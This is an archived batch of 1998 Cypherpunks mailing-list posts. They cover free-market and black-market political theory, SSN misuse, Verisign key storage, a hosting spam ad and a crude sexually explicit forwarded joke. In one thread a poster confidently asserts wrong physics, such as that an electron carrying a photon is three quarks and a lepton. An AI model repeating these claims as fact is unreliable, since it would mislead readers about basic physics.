unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Sat, 7 Nov 1998 06:07:03 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B258@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Matthew James Gering wrote:
> >Provided you don't corrupt the meaning of free-market to include 
> >any possible black market, then yes, there will *always* be a 
> >black market. It can be made rather insignificant however.

Petro responded:
> Assuming your definition of "free market" is "a market without
> regulation", you can't have a black market in a free market 
> since a black market is trade in violation of regulations.

Like I said, if you don't corrupt the meaning of free market.

Laissez Faire capitalism is based on a concept of individual rights.
Therefore the proper role of any government (in a libertarian state) or
individual/social institution (in rational anarchy) is to protect individual
rights (life, liberty, property), and act as an objective framework for
retributive force.

Therefore, any transaction that violates individual rights is immoral (if
not illegal) and constitutes a black market.

e.g. assassinations, ransom, stolen goods, extortion, slavery, etc.

To create a anarcho-capitalist definition of free market where everything
goes and there is no concept of individual rights is as immoral and perverse
as the statist concepts that similarly have no concept of individual rights
(fascism, communism).

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SECRET AGENT 66 <JOABJ@delphi.com>
Date: Sat, 7 Nov 1998 03:14:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Digicash bankruptcy
Message-ID: <01J3USZFHLJ694XOBF@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain



>The root failure of Interactive TV was the assumption             
>that the world wanted to spend its time passively consuming the dross
>pumped out through a 1000 channel

	Actually, the failure of interactive tv was that the world
was perfectly happy passively comsuming the dross
pumped out through a 1000 channels. 

	Probably explains the failure of digicash, too. 

		joab




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C" <pleontks@hotmail.com>
Date: Sat, 7 Nov 1998 08:14:30 +0800
To: Yankee1428@aol.com
Subject: Fwd: How true this is
Message-ID: <19981106233653.27724.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



it's rare that i do this...

>>Perfect Days
>>
>>
>>The Perfect Day For HER
>>
>>8:15	Wakeup to hugs & kisses
>>8:30	Weigh in 5lb lighter than yesterday
>>8:45	Breakfast in bed, fresh squeezed orange juice & croissants
>>9:15	Soothing hot bath with fragrant lilac bath oil
>>10:00	Light work out at club with handsome, funny personal trainer
>>10:30	Facial, manicure, shampoo & comb out
>>12:00	Lunch with best friend at outdoor cafe
>>12:45	Notice ex-boyfriends wife, she has gained 30lbs
>>13:00	Shopping with friends, unlimited credit
>>15:00	Nap
>>16:00	3 dozen roses delivered by florist, card is from secret admirer
>>16:15	Light work out at club, followed by gentle massage
>>17:30	Pick out outfit for dinner, primp before mirror
>>19:30	Candlelight dinner for two followed by dancing
>>22:00	Hot shower (alone)
>>22:30	Make love
>>23:00	Pillow talk, light touching & cuddling
>>23:15	Fall asleep in his big strong arms
>>
>>
>>The perfect day for HIM
>>
>>6:00	Alarm
>>6:15	Blowjob
>>6:30	Massive shit, while reading sports section of paper
>>7:00	Breakfast, Fillet mignon & eggs, toast & coffee
>>7:30	Limo arrives
>>7:45	Vodka Bloody Mary en route to airport
>>8:15	Private Jet to Augusta, Georgia (en route Coffee, Cigar & Wall
>>St Journal)
>>9:30	Limo to Augusta National Golf Club
>>9:45	Front nine holes at Augusta (2 under par)
>>11:45	Lunch, 2 dozen oysters on the half shell, 3 Hienekens
>>12:15	Blowjob
>>12:30	Back nine holes at Augusta (4 under par)
>>14:15	Limo back to airport (Vodka Martini)
>>14:30	Private Jet, Augusta to Nassau, Bahamas (nap)
>>15:15	Late afternoon fishing excursion with all female (topless) crew
>>16:30	Land world record light tackle Marlin (1249lbs)
>>17:00	Jet back home, massage & hand job en route by naked Elle
>>Macpherson
>>18:45	Shit, shave & shower
>>19:00	Watch CNN newsflash: Clinton resigns, Hillary and Al Gore farm
>>animal sex video released.
>>19:30	Dinner, Lobster appetizers, Dom Perignon (1963), 20oz New York
>>Steak
>>21:00	Wild Turkey & Cuban cigar
>>21:30	Sex with three women
>>23:00	Massage & Jacuzzi
>>23:45	Bed (alone)
>>23:50	12 second, 4 note fart, dog leaves room
>>23:55	Sleep


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 7 Nov 1998 08:10:26 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811062338.RAA00510@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 6 Nov 1998 12:34:34 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  	 (fwd)

> 	Assuming your definition of "free market" is "a market without
> regulation", you can't have a black market in a free market since a black
> market is trade in violation of regulations.

Actualy a black market is usualy goods gotten through theft or other illegal
means, not necessarily anything related to how or what is sold. If you don't
corrupt free-market to include legitimizing theft as a viable market
strategy then yes, you can in fact have a black market in a free-market.

Let's consider auto-theft. The issue isn't that you can't buy the car
through legitimate means, it just means you have to have more resources than
you have. So what do you do? You find somebody whose stolen a vehicle and is
willing to sell it to you at a discount.

> 	In other words, a Black market is when you trade either illegal
> goods illegally, or legal goods illegally.

Too strict and unrealistic a definition of black market.

> 	If there are no illegal goods, and there is no regulations limiting
> trading, then the black market cannot exist.

Of course not since we've now legitimized theft and murder with your
definition.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin <kkemp@magicnet.net>
Date: Sat, 7 Nov 1998 10:57:55 +0800
To: <cypherpunks@toad.com>
Subject: Hey there...................
Message-ID: <419.436105.76927211kkemp@magicnet.net>
MIME-Version: 1.0
Content-Type: text/plain



   Get yor own DotCom ! or transfer yours now !
   FREE SETUP, FREE TRANSFERS, HOSTING
   INCLUDED !

   Digital Global Networks =>> NO SPOOKY HIDDEN
   COSTS ! =>> On the net since it's birth.

   ALL DOMAIN HOSTING AND SETUP IS INCLUDED:
   ONLY $15.95/mo.

   Call NOW, on our toll-free registration line.  It's FREE
   ===>  1-800-549-6542  8am-8pm est.
        or  407-622-2172

   For ONLY $15.95/mo. You receive ALL of these services
   and MORE !
   1. Your own domain name www.AnyNameYouChoose.com
   2.  Starter 6pg website template with graphics.
   3. 20 megs of quality triple DS3 (digital) webspace.
   4. Total FTP access 24/7
   5. POP E-mail box.
   6. Unlimited e-mail addresses@AnyNameYouChoose.com
   7.TOLL FREE! WARM BODY helpline with no hold
       buttons!  1-800-549-6542
   8. 100megs of traffic/day!
   9. Support forum with all the tools you will ever need from
       HTML to Perl.
  10. Guaranteed 99% uptime.
  11. Ongoing pledge to price freeze!
  12. FREE SETUP !  NO HIDDEN COSTS !
  13. FREE TRANSFERS !
  14. One of the oldest and largest hosting and network
        providers in the world.

   Don't miss this 1-time 10-day opportunity from Digital
   Global Networks !

   CALL NOW  It's FREE====> 1-800-549-6542 or
   407-622-2172

   *Front page support available !
   **E-commerce, secure server service available !
   ***Webmaster accounts available !

   *****This is the only message you will receive.
            Your address has been automatically deleted.

   CALL NOW  It's FREE====> 1-800-549-6542
   or  407-622-2172




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 7 Nov 1998 09:07:36 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Grounding (fwd)
Message-ID: <199811070039.SAA00913@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 06 Nov 1998 09:26:05 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: Grounding (fwd) 

> Yeah I've got my old copy of Jackson. MTW too, for all the good it did
> me. Maxwell's equations can be used to form a wave equation too. I only
> bring up the Schroedinger equation because the solutions to simple
> particle-in-a-box examples are easy to generate and easy to visualize.

The problem is we're not discussing a particle in a box. We're discussing
the statistical mechanical behaviour of a group of particles. Apples and
oranges. One, you're scale of distance between the two is off by orders of
magnitude. Secondly, you're considering an electron carrying a photon as a
single wavicle, it ain't. It's a superposition of several wavicles (3 quarks
and a lepton to be exact under the standard model). Thirdly, you're trying
to model a group of particles as a single instance of Schroedengers Wave
equation, a big no no. Fourthly, you're failing to take into account the
interactions between the particles and those consequences because of mass
charge, which after all is the engine that drives this model.

In reference to your particle-in-a-box model, the point you seem to miss is
that the scale of the box is on the order of a few Planck distances. That
behaviour is grossly different than a ball 10 in. in diameter filled with a
gas of electrons (and potentialy protons if it's not a vacuum) all carrying
short-wavelength photons around.

> DC, Yes. AC, things are happening.

Where did the AC come from? We're talking about a spark gap that is only
going to emit electrons *and* is run by a battery (it's your baby). Where
the hell do I buy an AC battery pray tell?

Where? Under your example there is no mass charge flow because ground is
irrelevant. So we're left with only the gas like behaviours. Now it's
clear that the individual particle paths are going to be modelled via a
drunkards walk. So, where does this coherent flow come from?

If there is a flow it implies, because of the behaviour of like/dislike
charges, that there is a difference in charge.

> To solve the diffeq's for an EM wave incident on a conducting surface
> you have to make the solutions !inside! the conductor match the
> solutions outside the conductor. Only if the conductor is *perfect* does
> your assumption of nothing going on inside the conductor make sense.

What the hell are you talking about?....

Here's what we're discussing:

A generator emits electrons which carry a negative charge.

These electrons each also carry a photon of some quantity.

Like charges repel.

When a photon strikes an atom it will be absorbed if it's wavelength matches
one of the Bohr radii. This may cause one or more secondary photons to be
emitted as a result.

The assumption was the spark gap is in the center of the ball.

Because the spark gaps emission of electrons is random the resultant cloud
of particles can be modelled as a gas that is expanding from a point source.

The expansion is driven by the repelling effect of the charges.

This causes the the particles at time tau to, on average - remember we're
talking statistical mechanics here, expand at an equal rate, in effect
forming a bubble of particles coherent with tau. That rate is usualy related
to k * sqrt ( s ).

As the charges expand some will emit photons. Some of the atoms in the shell
will emit photons. Some of each will absorb photons.

At some point (tau + delta) the charge impacts the shell. This will in
effect increase the charge of the shell by 1 -e.

Now, by Gauss's Law, this charge in the gas will induce an opposite charge
on the inside surface of the globe.

Unlike charges attract. Therefore the gas of electrons are attracted to the
inside surface. Now since the globe is neutral it must follow by
conservation of charge that there is a negative charge equal to the charge
held in the gas on the *OUTSIDE* of the ball.

This is in addition to the charge that steadily builds up in the shell as
the electrons accrete over time. This can be modelled with an integral of
the flow rate of the current in the battery (it after all is Coulombs/s).
It's not too hard (k * I). (I'm not going to go into what happens as the
charge on the shell builds up as we're discussing here the applicability of
wave equations as a reliable model).

So what do you get? A hell of a charge that will go bang at some point when
some insulation give way.

See:

Physics
J. Orear
ISBN 0-02-389460-1
pp. 304
"Electrical Induction"

He uses your exact model except for the tether. It's a classic in Freshman
Physics and science museums.

> BTW - the skin depth for Cu at 100MHz is about 0.00026". The skin depth
> is proportional to f^(-0.5).

So what if the electron gives it's photon up to another which causes it to
bounce around through the Cu lattice till it gets to the other side knocking
an electron free (conservation of momentum) or emitting a free photon (which
is what we're *REALLY* talking about reducing with TEMPEST - you could think
of it as cooling the laptop at rf frequencies if you like, you could model
it with a spin-glass based cellular automaton). It's called charge migration
and there are also effects at high voltage which is called charge tunneling.
If you examine the literature of Japanese hi-v researchers they have become
adept at causing ball lightening to tunnel through insulators. It's pretty
interesting. There are also quite a few cases where the inducement fails and
the result is a broken ceramic plate because of the heating effects.

[rest deleted]


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 7 Nov 1998 02:23:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: don't use passwords as private keys (was Re: Using a password as a private key.)
In-Reply-To: <199810312353.SAA23037@camel7.mindspring.com>
Message-ID: <199811061754.SAA22579@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young <jya@pipeline.com> wrote:

> Speaking of promo, we saw last night on the Free Congress site a reference
> to a report titled "Cyhperpunks v. Cryptocrats: The Battle Over US Encryption
> Standards," by Lisa S. Dean.

Have you tried e-mailing Lisa?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@dueprocess.com>
Date: Sat, 7 Nov 1998 08:55:24 +0800
To: <cypherpunks@Algebra.COM>
Subject: RE: Quick, Dear -- Beat Me
In-Reply-To: <000401be087d$55f97aa0$3b8195cf@blanc>
Message-ID: <3.0.5.32.19981106193055.0082bdd0@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain



At 10:47 AM 11/5/98 -0500, Petro wrote:
>
>At 12:08 AM -0500 11/5/98, Blanc wrote:
>>From Duncan Frissell:
>>
>>I just went to the bank I do business with this week to open a new account.
>>They wanted my social security number, (which they actually already have on
>>record), and during a search on her handy database, the Customer Assistance
>>clerk informed me that there was another person in Florida using the same
>>number.
>>
>>>report and advice to notify the Social Security dept about it.   I don't
>>really
>>want to discuss it with them.  Think it would be to my benefit to just
>>leave it
>>alone?  <g> Probbly not.


>	If they are using your name as well, they could be damaging your
>credit rating.

Absolutely, and it is not limited to credit cards.  It would pop up if, for
example, you buy a new car.  If your rating does become negatively
affected, the creditor could care less about your explanation of some Joe
Anonymous using your SSN.  His first question would be why didn't you
report it when you found out.  Whatever credit you'd be applying for would
get unbelievably mired in beaucracy - something you wouldn't need.
  
Additionally, it can mushroom in other areas as well.  This other person is
getting credit for the number of years that you have been employed.  Also,
if s/he applies for SSD or SSI (disability or supplemental security
income), you will be impacted upon.  Some states require SSN's for driving
licenses, and there's a myriad of potential problems here as well.  Tax
returns can potentially become a complication.  And the list goes on....

All in all, you should seriously reconsider your decision of not reporting
the problem.


***********************************************************
Lynne L. Harrison, Esq.           |    "The key to life:
Poughkeepsie, New York            |     - Get up;
mailto:lharrison@dueprocess.com   |     - Survive;
http://www.dueprocess.com         |     - Go to bed."
***********************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Sat, 7 Nov 1998 13:38:35 +0800
To: cypherpunks@toad.com
Subject: verisign digital id's for outlook <shudder>
Message-ID: <3.0.3.32.19981106210608.00956390@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain





A quick question for all you security-savvy people.  Our IT instructor has
asked the class to sign up for verisigns' 60-day trial of a class 1 digital
id.  

pfaugh.  give me a copy of PGP anyday!  at least I can (easily) take my
keys with me!

I also understand that a well (poorly?) written activeX applet can grab my
key basically without my knowledge (to speak nothing of the other myriad
holes in win98/95)

My question is, where the hell is the private key kept on the users box?
How is it protected against attack? I had to voice my displeasure with the
instructor that I could not take the ID with me on a floppy so that the
night class would not have potential access, but got the usual 'it is
secure enough, let it be' attitude.

Thanks in advance for any information!

 

-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:354111 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
"You shouldn't overestimate the IQ of crooks." - Stuart Baker, of NSA
explaining why crooks and terrorists who are smart enough to use data
encryption would be stupid enough to choose DES
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 7 Nov 1998 11:35:45 +0800
To: cypherpunks@cyberpass.net
Subject: ASHCROFT 2000 RIP?
In-Reply-To: <19981107005439.30238.qmail@listbox.com>
Message-ID: <v04020a49b2696a8a2532@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:04 PM -0500 on 11/6/98, National Review DC wrote:


> ASHCROFT 2000 RIP?
> Gov. Mel Carnahan (D., Mo.) has announced he will challenge Sen. John
> Ashcroft's (R., Mo.) re-election. It's an ominous move for the freshman
> senator's presidential bid. Sen. Phil Gramm had a tougher race than
> usual following his disastrous 1996 run for the presidency, and he was
> running against a political nobody. Gov. Carnahan is politically
> formidable, and could give Ashcroft a run for his money even without the
> distractions, missed votes, and potential embarrassments of a
> presidential campaign. Ashcroft now must worry about the Dornan effect.
>
> On the other hand, Ashcroft would be able to convert any funds raised in
> a presidential campaign to his Senate race if he lost the former. But
> handicappers already question how much he can raise.

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Sat, 7 Nov 1998 14:46:00 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B258@yarrowbay.chaffeyhomes.com>
Message-ID: <3643E9AE.24027635@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Matthew James Gering wrote:
> 
> Laissez Faire capitalism is based on a concept of individual rights.
> Therefore the proper role of any government (in a libertarian state) or
> individual/social institution (in rational anarchy) is to protect individual
> rights (life, liberty, property), and act as an objective framework for
> retributive force.

No government can protect individual rights.  The only way one could do
so would be if it: (a) could predict the future, and act to prevent
certain futures from happening; or (b) it controls every aspect and
motion of each individual's life, thereby ensuring that nobody steps out
of line.

Unfortunately, the first scenario is impossible, given the current state
of the art, and the second results in the complete extinction of
individual rights in the name of safety (which is the ultimate goal of
the current powers that be, it seems).

All any state can do is threaten to "retaliate" against (why not just
say "attack") people who disobey its edicts.  In order for this threat
to be credible, the state must wield sufficient power to kill any
individual (or group of individuals) who would stand against it.  If it
does not have this power, it cannot govern.  The problem is, if it does
have this power, then there is nothing to stop those individuals in
control of the state from violating the individual rights of its
citizens.  As often seems the case today, for example.

The system you suggest, which I assume consists of a state with a
"minimal" amount of power, run by enlightened people, is in a state of
extremely unstable equilibrium (if it is indeed in equilibrium).  If it
wields just enough power to enforce its will, that power can be used by
evil men to increase its power.

Just look at what happened after the Constitutional coup took place in
the fledgling USA.  Remember the Whiskey Rebellion?  When we lost the
Articles of Confederation, we were taking the first steps down the road
to the tyranny of today.  The anti-federalists predicted this, although
they sorely underestimated how far it would go --assuming that it would
be stopped by another revolution.

The minimalist state has been tried.  It lasted less than a decade
before it started turning into what we have today, and what was left of
its spirit died with the war of northern aggression.

The only truly free system is one in which there is no body of people
calling itself a government which can enforce its will over the
individual.  The only way people can seem to be free living under such a
body is entirely dependent upon the good will of their masters, and this
is a shaky assumption to make.

> Therefore, any transaction that violates individual rights is immoral (if
> not illegal) and constitutes a black market.

How about:  Any action that involves the initiation of force against the
property of another person (the person belongs to himself, of course) is
immoral.

This neatly tidies up the obvious question of exactly what "individual
rights" are.  There's a partial list of them in the bill of rights, but
it is not complete, by its own admission.  Furthermore, the above
definition excludes such dubious rights as the "right to an education",
the "right to welfare", etc.

> e.g. assassinations, ransom, stolen goods, extortion, slavery, etc.

All of the above involve the initiation (or threat of initiation) of
force.  Hence they are immoral, and the victims and any bystanders would
be morally justified in using force against the initiators.  Of course,
this would not be true in a governed society, where the state must hold
a monopoly on the use of force, if only to maintain its own position. 
Much less efficient.  

Besides, putting a subset of the population to the task of defining what
is and isn't moral leads to such inanities as "homosexuality is
immoral", "premarital sex/underage sex is immoral", and "ingesting
certain compounds is immoral."  

We've all got our pet peeves.  Would you like to live under mine?  Would
I like to live under yours?  Can I trust you to be tolerant?  Can I
trust your successors, 20 years from now?  Can my descendants trust
subsequent successors, 200 years later?  Experience tends to show the
contrary.

> To create a anarcho-capitalist definition of free market where everything
> goes and there is no concept of individual rights is as immoral and perverse
> as the statist concepts that similarly have no concept of individual rights
> (fascism, communism).

The anarcho-capitalist free market is not one where "everything goes,"
and there is indeed a strong concept of individual rights.  What is
moral and not moral is defined by society on an individual basis.  The
first and only rule is:

No one has the right to initiate force against another or another's
property.

This is the fundamental and only "social contract" we make.  Anyone who
disagrees with this is obviously antisocial, and nobody's going to want
to live with him (or allow him to continue living, if he attacks
someone).

>From this, morality follows.  If X does Y to Z, and if Y is perceived as
immoral, then X is not going to be very popular with Z or anyone else,
unless he can make amends.  No one will want to trade with him, be near
him, etc.  This is a very strong motive to avoid doing immoral things.

If Y is really nasty, such as the initiation of force, then X is going
to be in *deep* trouble.  Z may well shoot him out of self defense, and
even if he survives his action, he'll have to pay a *lot* of restitution
before people will trust him again, if ever.  Law enforcement by
ostracism --read L. Neil Smith's "The Probability Broach", for a more
detailed description.  

In summary, a free market is far from being an immoral market.  In fact,
it is the most moral market there is, since there is no state which
holds the "right" to initiate force.

Regards,

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Sat, 7 Nov 1998 16:52:14 +0800
To: cypherpunks@Algebra.COM
Subject: RE: Quick, Dear -- Beat Me
Message-ID: <3.0.3.32.19981107090029.008caa20@apf2.com>
MIME-Version: 1.0
Content-Type: text/enriched


>From: "Lynne L. Harrison" <lharrison@dueprocess.com>
>Subject: RE: Quick, Dear -- Beat Me
>At 10:47 AM 11/5/98 -0500, Petro wrote:

>>At 12:08 AM -0500 11/5/98, Blanc wrote:
>>>From Duncan Frissell:
>>>
>>>I just went to the bank I do business with this week to open a new account.
>>>They wanted my social security number, (which they actually already have on
>>>record), and during a search on her handy database, the Customer Assistance
>>>clerk informed me that there was another person in Florida using the same
>>>number.

Long list of problems which could result from someone using your SSN snipped...

>All in all, you should seriously reconsider your decision of not reporting
>the problem.
>
>

So much for the SSN "never" becoming a national ID number! 

Since your SS account and pension can be negatively impacted, this tends to reinforce the idea that your SSN should be a secret. But how can we keep it a secret if they keep putting it on public documents such as drivers licenses? Seems to me that when they are all done making the SSN the official National ID number they will need to give us a NEW SSN that is secret, kind of like a PIN to unlock and validate our National ID and SS accounts. 

...and latter a PIN to protect the PIN...

APF


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Sat, 7 Nov 1998 16:51:51 +0800
To: cypherpunks@Algebra.COM
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <3.0.3.32.19981107091528.00922620@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: Jim Choate <ravage@einstein.ssz.com>
>Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
(fwd)
>
>Forwarded message:
>
>> Date: Fri, 6 Nov 1998 12:34:34 -0500
>> From: Petro <petro@playboy.com>
>> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>>  	 (fwd)

>
>> 	In other words, a Black market is when you trade either illegal
>> goods illegally, or legal goods illegally.
>
>Too strict and unrealistic a definition of black market.

I would add the clause illegal goods (apparently) legally. This covers the
case where stolen property is moved through legitimate channels. Even if
the government doesn't restrict and legitimize the channels there must be
restrictions on theft and inappropriate acquisition (fraud) of goods (and
services) otherwise the result is not free-market, but rather barbarism and
brute force rule.

Under the "free-for-all" definition of free market, the final result would
actually be slavery (since you wouldn't produce the items that I keep
stealing from you unless I hold a gun to your head), and war (in order to
get resources I can pay or I can steal, since I don't like to pay, I'll
just get a bigger army and steal it from you). Sounds drastic? There are a
few examples today in the parts of Africa controlled by warlords.

>
>> 	If there are no illegal goods, and there is no regulations limiting
>> trading, then the black market cannot exist.
>
>Of course not since we've now legitimized theft and murder with your
>definition.
>
Nothing is EVER black and white. And free-market can never be 100% free or
it will cease to be a market.

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 8 Nov 1998 01:43:03 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811071710.LAA02112@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 07 Nov 1998 01:33:18 -0500
> From: Michael Hohensee <mah248@nyu.edu>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)

> No government can protect individual rights.

That isn't a reasonable statement. There is nothing in the definition or
application of 'government' or 'individual rights' that preclude this. The
issue becomes in a practical sense how the practitioners of a government
system respect individual rights. If they are willing to do away with them
to protect them (as we seem to be moving toward in this country) then of
course there are no individual rights.

Of course, this implies there are no collective rights either.

>  The only way one could do
> so would be if it: (a) could predict the future, and act to prevent
> certain futures from happening; or (b) it controls every aspect and
> motion of each individual's life, thereby ensuring that nobody steps out
> of line.

What has that to do with protecting individual rights? Clarify please.

> All any state can do is threaten to "retaliate" against (why not just
> say "attack") people who disobey its edicts.  In order for this threat
> to be credible, the state must wield sufficient power to kill any
> individual (or group of individuals) who would stand against it.  If it
> does not have this power, it cannot govern.

This is a quaint and completely artificial distinction.

> citizens.  As often seems the case today, for example.

We also see quite a few situations where the opposite occurs as well.

> The system you suggest, which I assume consists of a state with a
> "minimal" amount of power, run by enlightened people, is in a state of

Anyone who assumes noble oblige is an idiot. There are no enlightened
people, intelligence and wealth no more prepare an individual for a
position in government than they prepare them for anything else.
Rich/intelligent people don't make less mistakes than those who aren't.

> extremely unstable equilibrium (if it is indeed in equilibrium).  If it

If you're talking of Hayek's equilibrium, it's nothing more than a
bastardization of a thermodynamics term to represent the status quo.
Equilabrium in the economic sense simply means that people do today what
they did yesterday. In general they do about as often as they don't.

> wields just enough power to enforce its will, that power can be used by
> evil men to increase its power.

Evil? Where did religion come into this at?

> Just look at what happened after the Constitutional coup took place in
> the fledgling USA.  Remember the Whiskey Rebellion?  When we lost the
> Articles of Confederation, we were taking the first steps down the road
> to the tyranny of today.  The anti-federalists predicted this, although
> they sorely underestimated how far it would go --assuming that it would
> be stopped by another revolution.

There have been several since then. The Civil War and the civil rights
movement in the 60's are two good examples (on the opposite end of the
'use-of-violence' scales).

> The minimalist state has been tried.

No, that was a non-federalist state where the individual states acted as
individuals in a collective. Because of the collective nature of the state
governments it didn't work. A minimalist state would be anarchy.

> The only truly free system is one in which there is no body of people
> calling itself a government which can enforce its will over the
> individual.  The only way people can seem to be free living under such a
> body is entirely dependent upon the good will of their masters, and this
> is a shaky assumption to make.

No it isn't the only way. The only way is to clearly define the duties of
each level of government and build a system of checks and balances that
prohibit them from moving outside their domains. A good first attempt at
this was the Constitution and the Bill of Rights (in particular 9 & 10).
The problem is that there are individuals who don't want to be limited in
their authority. It's a person problem not a government problem.

> How about:  Any action that involves the initiation of force against the
> property of another person (the person belongs to himself, of course) is
> immoral.

Morality? Why do you keep bringing religion and individual beliefs into it?

A person is, they don't belong to anyone.

It should be:

Any act that harms a person or their property without their prior permission
is a crime. There are no exceptions other than immediate personal self
defence, which terminates upon the application of minimal force to guarantee
the threat will not reoccur (in many cases this means kill the attacker).
This should apply to all individuals participating in a governmental role as
well.

> This neatly tidies up the obvious question of exactly what "individual
> rights" are.  There's a partial list of them in the bill of rights, but
> it is not complete, by its own admission.

By it's own admission they are protected from denial by the 9th and 10th so
they don't need to be listed (unlike the 10th lists the duties of the
government system). The problem is conservatives and liberals alike don't
respect those boundaries. They want more.

>  Furthermore, the above
> definition excludes such dubious rights as the "right to an education",
> the "right to welfare", etc.

Now you're doing exactly what you are complaining about. Your defining others
rights when you don't want them defining yours.

People may very well have a right to welfare and an education (I believe
people have a civil right to medical and legal advice gratis - stems from
the pursuit of life, liberty, and happiness). The issue isn't that. The
issue is *what are the duties of the government as defined in its charter*.
If those duties are not in there (and they're not) then it shouldn't be
doing it without an amendment from the charter.

> All of the above involve the initiation (or threat of initiation) of
> force.  Hence they are immoral, and the victims and any bystanders would
> be morally justified in using force against the initiators.  Of course,
> this would not be true in a governed society, where the state must hold
> a monopoly on the use of force, if only to maintain its own position. 
> Much less efficient.  

Go read the Constitution, it's true here in our governemnt though many
people don't want it to be so. As a result they find all kinds of childish
and inane reasons to deny the obvious.

Like it or not the federal governments panapoly of current powers are as
vacous as the king is naked.

It's like executive orders, unless you happen to work for the executive
branch they aren't worth the paper they're written on. Why? Because at no
point is the office of President given this authority over anyone other than
executive branch employees. He has no more authority to dictate general
behaviour via that mechanism than you or I do - zero. Per the 10th there is
not one sentence in the Constitution that delegates that authority to the
office.

